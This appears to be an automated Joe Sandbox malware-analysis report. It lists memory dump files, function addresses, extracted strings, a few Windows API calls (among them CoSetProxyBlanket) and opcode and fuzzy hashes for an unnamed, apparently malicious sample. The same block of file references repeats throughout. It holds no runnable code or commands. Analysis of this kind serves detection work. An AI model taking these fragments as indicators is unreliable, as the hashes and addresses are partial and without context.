Associated: 00000000.00000002.2343328559.0000000000103000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343347154.0000000000105000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343347154.0000000000290000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343347154.0000000000369000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343347154.0000000000391000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343347154.0000000000398000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343347154.00000000003A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343839067.00000000003A8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343961870.0000000000542000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344010878.0000000000543000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b0000_file.jbxd

Similarity

API ID:
String ID: 5A1B8FA3BC14C5DD23D904AF30EFEBBC$EIFT$_P$w
API String ID: 0-4037780464
Opcode ID: 034f7c8e5032b42507a6f55e9ba29bafd9b9e7649c00ee6005725d356c416d93
Instruction ID: f6c50e283003149c1dd90b386dad62bde70ebeef289e34467898cecc6d727086
Opcode Fuzzy Hash: 034f7c8e5032b42507a6f55e9ba29bafd9b9e7649c00ee6005725d356c416d93
Instruction Fuzzy Hash: D6C1357160C3409BD718DF35C8526AFBBE6EBD2314F18892DE5D28B391DA38C909CB56

Function 000D6170 Relevance: 5.3, Strings: 4, Instructions: 318
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

4zVc, xrefs: 000D621C
YNMZ, xrefs: 000D6446
cba`, xrefs: 000D61C1
8zVc, xrefs: 000D627D

Memory Dump Source

Source File: 00000000.00000002.2343250353.00000000000B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000000.00000002.2343232267.00000000000B0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343250353.00000000000F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343328559.0000000000103000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343347154.0000000000105000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343347154.0000000000290000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343347154.0000000000369000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343347154.0000000000391000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343347154.0000000000398000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343347154.00000000003A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343839067.00000000003A8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343961870.0000000000542000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344010878.0000000000543000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b0000_file.jbxd

Similarity

API ID: InitializeThunk
String ID: 4zVc$8zVc$YNMZ$cba`
API String ID: 2994545307-1799417857
Opcode ID: fefb8ed23cc7aa0ea36f4e49b5f62fa3a7cef77ab4a98920e17737b2dbdc43fb
Instruction ID: 9d9a0b22bd56a04f251fe2a2b560fc22c780fb1e3095c7f7c1c097bf469d07e2
Opcode Fuzzy Hash: fefb8ed23cc7aa0ea36f4e49b5f62fa3a7cef77ab4a98920e17737b2dbdc43fb
Instruction Fuzzy Hash: 0B9155B2E043118BD724DE25DC8177B72E6EBD1314F1D853EE8858B352EA3AAD00C7A1

Function 000B87F0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 146
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ExitProcess.KERNEL32(00000000), ref: 000B897C

Strings

YO9W, xrefs: 000B8822

Memory Dump Source

Source File: 00000000.00000002.2343250353.00000000000B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000000.00000002.2343232267.00000000000B0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343250353.00000000000F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343328559.0000000000103000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343347154.0000000000105000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343347154.0000000000290000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343347154.0000000000369000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343347154.0000000000391000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343347154.0000000000398000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343347154.00000000003A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343839067.00000000003A8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343961870.0000000000542000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344010878.0000000000543000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b0000_file.jbxd

Similarity

API ID: ExitProcess
String ID: YO9W
API String ID: 621844428-386669604
Opcode ID: bb61900cde2b899cff29f366493596a1d9e5d3c593b50088be59909ca6518de4
Instruction ID: 77e97abddde671e7035c930bed26ac2146d897d6468b9be7d500857920801ccd
Opcode Fuzzy Hash: bb61900cde2b899cff29f366493596a1d9e5d3c593b50088be59909ca6518de4
Instruction Fuzzy Hash: FF314577F6021807C75C79B98C523AAB58B4BC4614F0F963C9DD9AB396EDB89C0482D2

Function 000C6B7E Relevance: 1.8, APIs: 1, Instructions: 335COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2343250353.00000000000B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000000.00000002.2343232267.00000000000B0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343250353.00000000000F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343328559.0000000000103000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343347154.0000000000105000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343347154.0000000000290000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343347154.0000000000369000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343347154.0000000000391000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343347154.0000000000398000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343347154.00000000003A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343839067.00000000003A8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343961870.0000000000542000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344010878.0000000000543000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3f9c7386ace819e62b6fc32cd22ae7a8340ffa61962e850bf7b4011a22de45a9
Instruction ID: 48ba72c984299c6ebf4879609fc55b368c1105dad36e10d98882ba55c2d9dc3b
Opcode Fuzzy Hash: 3f9c7386ace819e62b6fc32cd22ae7a8340ffa61962e850bf7b4011a22de45a9
Instruction Fuzzy Hash: 3FA136B16007418FC734CF24C891B6BBBE2EF95310B188A6DD49A8B793E735E945CB51

Function 000EE690 Relevance: 1.6, Strings: 1, Instructions: 384COMMON

Download Yara Rule

Strings

@CDE, xrefs: 000EE8D1

Memory Dump Source

Source File: 00000000.00000002.2343250353.00000000000B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000000.00000002.2343232267.00000000000B0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343250353.00000000000F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343328559.0000000000103000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343347154.0000000000105000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343347154.0000000000290000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343347154.0000000000369000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343347154.0000000000391000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343347154.0000000000398000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343347154.00000000003A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343839067.00000000003A8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343961870.0000000000542000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344010878.0000000000543000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b0000_file.jbxd

Similarity

API ID: InitializeThunk
String ID: @CDE
API String ID: 2994545307-1513065382
Opcode ID: cc6325a3de0e736090576e446295444dc9e05b4ed5d25a596ae906b99c963f05
Instruction ID: f2b444b0ab16ed7d950d920a919f0c6d2c1b27f3d7bc46fdaeea19c3c9b6b787
Opcode Fuzzy Hash: cc6325a3de0e736090576e446295444dc9e05b4ed5d25a596ae906b99c963f05
Instruction Fuzzy Hash: 0EB133717483854FC328CB2AC8D093BBBE6ABE5314F1C893DE48697396DA349C05C792

Function 000EB480 Relevance: 1.5, APIs: 1, Instructions: 14libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL(000ED4FB,005C003F,0000002C,?,?,00000018,?,00000000,?,?,?,?,00000000,00000000), ref: 000EB4AE

Memory Dump Source

Source File: 00000000.00000002.2343250353.00000000000B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000000.00000002.2343232267.00000000000B0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343250353.00000000000F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343328559.0000000000103000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343347154.0000000000105000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343347154.0000000000290000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343347154.0000000000369000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343347154.0000000000391000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343347154.0000000000398000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343347154.00000000003A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343839067.00000000003A8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343961870.0000000000542000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344010878.0000000000543000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b0000_file.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
Instruction ID: 0c3231226d6b2b3a527619dcc08e6164a4fafcc19f94aab6dc14dc2c5ea58878
Opcode Fuzzy Hash: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
Instruction Fuzzy Hash: A2E0FE75908316AF9A08CF45C14444EFBE5BFC4714F11CC8DA4D863210D3B0AD46DF82

Function 000C7E82 Relevance: 1.5, Strings: 1, Instructions: 236COMMON

Download Yara Rule

Strings

tuv, xrefs: 000C8856

Memory Dump Source

Source File: 00000000.00000002.2343250353.00000000000B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000000.00000002.2343232267.00000000000B0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343250353.00000000000F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343328559.0000000000103000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343347154.0000000000105000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343347154.0000000000290000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343347154.0000000000369000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343347154.0000000000391000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343347154.0000000000398000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343347154.00000000003A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343839067.00000000003A8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343961870.0000000000542000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344010878.0000000000543000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b0000_file.jbxd

Similarity

API ID:
String ID: tuv
API String ID: 0-2475268160
Opcode ID: d6e32715fee23b5efc99d6814fec44e1f3443e4eca5ba990eb9f203dafdd71d3
Instruction ID: be5853a0a29f9f37f9e596e93d0b441805c77bfef952b78b8838c50828b329a2
Opcode Fuzzy Hash: d6e32715fee23b5efc99d6814fec44e1f3443e4eca5ba990eb9f203dafdd71d3
Instruction Fuzzy Hash: E66156B2604700CFD7208F24D891BBBB3E1FF95364F18456DE99A477A1E735A805DB10

Function 000EDBD0 Relevance: 1.3, Strings: 1, Instructions: 97COMMON

Download Yara Rule

Strings

@, xrefs: 000EDC39

Memory Dump Source

Source File: 00000000.00000002.2343250353.00000000000B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000000.00000002.2343232267.00000000000B0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343250353.00000000000F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343328559.0000000000103000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343347154.0000000000105000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343347154.0000000000290000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343347154.0000000000369000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343347154.0000000000391000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343347154.0000000000398000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343347154.00000000003A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343839067.00000000003A8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343961870.0000000000542000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344010878.0000000000543000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b0000_file.jbxd

Similarity

API ID: InitializeThunk
String ID: @
API String ID: 2994545307-2766056989
Opcode ID: eddb16a0e3b1dbb1a7cb9ec11e88ba68eb05e791003780c08b003145b8f27297
Instruction ID: 4bdebf7fa1c9052c6860e93aa866bed5c575eabe89b29280b48e588f9bac576e
Opcode Fuzzy Hash: eddb16a0e3b1dbb1a7cb9ec11e88ba68eb05e791003780c08b003145b8f27297
Instruction Fuzzy Hash: 163133B11083058FC314DF19C8C166BFBF8FF95350F14892EE58A97291D3759908CB96

Function 000B9CC0 Relevance: 1.3, Strings: 1, Instructions: 64COMMON

Download Yara Rule

Strings

\U^_, xrefs: 000B9CE5

Memory Dump Source

Source File: 00000000.00000002.2343250353.00000000000B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000000.00000002.2343232267.00000000000B0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343250353.00000000000F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343328559.0000000000103000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343347154.0000000000105000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343347154.0000000000290000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343347154.0000000000369000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343347154.0000000000391000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343347154.0000000000398000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343347154.00000000003A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343839067.00000000003A8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343961870.0000000000542000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344010878.0000000000543000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b0000_file.jbxd

Similarity

API ID:
String ID: \U^_
API String ID: 0-352632802
Opcode ID: 6f2d10b3d16593e352830d41a884fc50667941ff175489b35a0427abef1384fe
Instruction ID: 8875b3819f642f14739cc85f4bedc81448fbf76b6c84258b91fcb2d9c9075c2c
Opcode Fuzzy Hash: 6f2d10b3d16593e352830d41a884fc50667941ff175489b35a0427abef1384fe
Instruction Fuzzy Hash: 5511227060C3808FD3248F309844AABBBE5EBD7344F104A2CE1C56B281C735990ACF96

Function 000C0FD6 Relevance: .9, Instructions: 882COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2343250353.00000000000B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000000.00000002.2343232267.00000000000B0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343250353.00000000000F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343328559.0000000000103000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343347154.0000000000105000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343347154.0000000000290000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343347154.0000000000369000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343347154.0000000000391000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343347154.0000000000398000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343347154.00000000003A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343839067.00000000003A8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343961870.0000000000542000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344010878.0000000000543000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ac6353f106ef7bb2f237a5d10dad92d7a56fca2d7c2ef4cdad368d70cf2dfda5
Instruction ID: e4ca11405d22813ea87d556b3cf27fab6f28ac1e90068f2611e3f591700da691
Opcode Fuzzy Hash: ac6353f106ef7bb2f237a5d10dad92d7a56fca2d7c2ef4cdad368d70cf2dfda5
Instruction Fuzzy Hash: 2672E575604B408FD724DF38C4957AEBBE1AB96310F198A3DD8EB87792E634E505CB02

Function 000EDCF0 Relevance: .3, Instructions: 272COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2343250353.00000000000B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000000.00000002.2343232267.00000000000B0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343250353.00000000000F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343328559.0000000000103000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343347154.0000000000105000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343347154.0000000000290000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343347154.0000000000369000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343347154.0000000000391000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343347154.0000000000398000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343347154.00000000003A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343839067.00000000003A8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343961870.0000000000542000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344010878.0000000000543000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b0000_file.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 65855bef847d358798a2e31744bdf0bbf00667fbe4635e1ea11bb0bd5d67d5b7
Instruction ID: 07e34efa338b543e500bf7d39d29582aadc15d27dc2f7ed3a3966253fe0b5550
Opcode Fuzzy Hash: 65855bef847d358798a2e31744bdf0bbf00667fbe4635e1ea11bb0bd5d67d5b7
Instruction Fuzzy Hash: 0C7125326043459FC718EE2AC850A7EB3E6EFD5750F1AC43EE4869B361EA3098119782

Function 000E9B90 Relevance: .2, Instructions: 236COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2343250353.00000000000B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000000.00000002.2343232267.00000000000B0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343250353.00000000000F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343328559.0000000000103000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343347154.0000000000105000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343347154.0000000000290000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343347154.0000000000369000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343347154.0000000000391000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343347154.0000000000398000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343347154.00000000003A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343839067.00000000003A8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343961870.0000000000542000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344010878.0000000000543000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b0000_file.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 70e7fb5c39d0003d6e8084b89c2802faf10108118085e5ae51bf16f6ce235107
Instruction ID: 80d876e2c714f0636663b6fb19e46ff3e2945dc5f1eb4f70b977ae4b14ef5a45
Opcode Fuzzy Hash: 70e7fb5c39d0003d6e8084b89c2802faf10108118085e5ae51bf16f6ce235107
Instruction Fuzzy Hash: 7E616EB26082545FD728DB29DD50B7BB7D3EBD0304F2D846DD586AB356EA31AC01CB81

Function 000EB420 Relevance: 1.5, APIs: 1, Instructions: 30memoryCOMMON

Download Yara Rule

APIs

RtlReAllocateHeap.NTDLL(?,00000000,?,?,?,?,000BB29B,?,00000001,?,?,?,?,?,?,?), ref: 000EB452

Memory Dump Source

Source File: 00000000.00000002.2343250353.00000000000B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000000.00000002.2343232267.00000000000B0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343250353.00000000000F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343328559.0000000000103000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343347154.0000000000105000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343347154.0000000000290000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343347154.0000000000369000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343347154.0000000000391000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343347154.0000000000398000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343347154.00000000003A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343839067.00000000003A8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343961870.0000000000542000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344010878.0000000000543000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b0000_file.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: a53ecd97ceb5b193209cde93c7fea907b911201690c147610a03356f94b6c767
Instruction ID: 2dd00bbac5c8080487eeef970ca97d69f95dfa88d3726f2edd8983f2c37091a0
Opcode Fuzzy Hash: a53ecd97ceb5b193209cde93c7fea907b911201690c147610a03356f94b6c767
Instruction Fuzzy Hash: 43E02BB2904155EFD2112B367C05B5B36789F86B10F060431F44172157DB36E801D5D6

Function 000E0879 Relevance: 1.5, APIs: 1, Instructions: 28COMMON

Download Yara Rule

APIs

CoSetProxyBlanket.COMBASE ref: 000E08C3

Memory Dump Source

Source File: 00000000.00000002.2343250353.00000000000B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000000.00000002.2343232267.00000000000B0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343250353.00000000000F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343328559.0000000000103000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343347154.0000000000105000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343347154.0000000000290000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343347154.0000000000369000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343347154.0000000000391000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343347154.0000000000398000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343347154.00000000003A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343839067.00000000003A8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343961870.0000000000542000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344010878.0000000000543000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b0000_file.jbxd

Similarity

API ID: BlanketProxy
String ID:
API String ID: 3890896728-0
Opcode ID: 2339493ee080c61cb34a6c884bb89fc250c44668a42590c7698d150c0545c976
Instruction ID: d3e311655df082fce042dd62b5860b8a89442d6f710502ba43d5c3edf1791799
Opcode Fuzzy Hash: 2339493ee080c61cb34a6c884bb89fc250c44668a42590c7698d150c0545c976
Instruction Fuzzy Hash: 1D01B2752497028BE310CF64D5D8B5BBBF1AB84304F14891CE4954B395D7B9A9498FC2

Function 000DE343 Relevance: 1.5, APIs: 1, Instructions: 27COMMON

Download Yara Rule

APIs

CoSetProxyBlanket.COMBASE ref: 000DE38C

Memory Dump Source

Source File: 00000000.00000002.2343250353.00000000000B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000000.00000002.2343232267.00000000000B0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343250353.00000000000F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343328559.0000000000103000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343347154.0000000000105000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343347154.0000000000290000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2343347154.0000000000369000.00000040.00000001.01000000.00000003.sdmpDownload File
